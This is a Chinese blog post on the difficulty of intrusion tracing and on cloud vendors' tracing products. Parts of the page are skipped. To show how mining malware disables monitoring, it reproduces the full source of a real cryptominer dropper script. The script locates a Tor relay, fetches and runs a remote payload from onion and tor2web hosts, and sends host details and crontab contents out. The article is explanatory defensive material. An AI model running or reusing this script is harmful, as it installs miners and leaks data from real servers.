入侵溯源难点和云溯源体系建设

万海旭 • 2023-01-02 • 云技术社区 • 266 阅读

1.为什么攻击溯源不是一件容易的事？

服务器被攻击的时候，寻找到确切的攻击原因，还原真实攻击路径是一件非常耗时和烧脑的事情。

来解释一下为什么？

黑客搞你：以点入侵。

好比古代皇帝翻牌，你管理的服务器集群的漏洞就像黑客手中的嫔妃，任由选择，其可以选择任意一条路径来进行入侵。

Chronicle产品能力补充图解

国外在云上主机安全产品的建设思路同国内不同，强调责任共担，如AWS云安全中心强调的责任共担模型：

链接：https://aws.amazon.com/cn/compliance/

AWS责任共担模型

AWS安全合作伙伴解决方案：

链接：https://aws.amazon.com/cn/partner-solution/security/

AWS安全合作伙伴解决方案

国外云上安全溯源解决方案方面，核心逻辑：强调合作伙伴能力互补，用户安全责任共担。目前还未看到较成熟和便捷使用的云内安全攻击溯源产品，在用户遇到问题时，以合作伙伴服务的模式来解决问题。

4.2国内领先解决方案：

腾讯云高级威胁追溯系统ATTS：

官方链接：https://cloud.tencent.com/document/product/1017

ATTS系统

可申请试用，ATTS在公有云上还属于内测阶段，还未供应公有云形态产品。

阿里云安全中心溯源功能：

官方链接：https://www.aliyun.com/product/sas

蠕虫传播事件溯源链路图

WEB漏洞入侵事件溯源链路图

阿里云在入侵溯源体系建设是走在前沿的，已经实现了解决方案向公有云产品化的转型。

虽然无法了解到其产品节点监控采集的逻辑是什么，但我相信阿里云的安全同学同矿马的对抗过程，可能会面对同样一个问题：

矿马会首先杀死监控节点进程，令监控失联。

打个比方，之前在实战矿马系列文章中分享过的/root/.systemd-service.sh源代码：

链接：https://cloud.tencent.com/developer/inventory/2702/article/1731875

#!/bin/bash
exec &>/dev/null
echo sMA4p3iYpUgY2CJZoyKJ5M66ce+K50VAIO2IKC8A1NT2JSksIXBHXJ8PYNYVJ6p0
echo
sMA4p3iYpUgY2CJZoyKJ5M66ce+K50VAIO2IKC8A1NT2JSksIXBHXJ8PYNYVJ6p0
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd")
sockz() {
n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%13))]}/$p | grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b" |tr ' ' '\\n'|sort -uR|head -1)
}
fexe() {
for i in . $HOME /usr/bin $d /tmp /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
u() {
sockz
fexe
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}
for h in tor2web.in tor2web.it tor2web.io tor2web.su onion.com.de tor2web.to onion.sh
do
if ! ls /proc/$(head -1 /tmp/.X11-unix/01)/status; then
u $t.$h
else
break
fi
done |base64 -d|bash

这只是其中一个案例，矿马会对自启动任务，密钥，ssh配置，系统进程等诸多系统进程和配置文件篡改和替换，倘若我们的监控节点agent任务在其中，矿马的文件替换动作就会让我们的监控节点失联，造成无信息可查。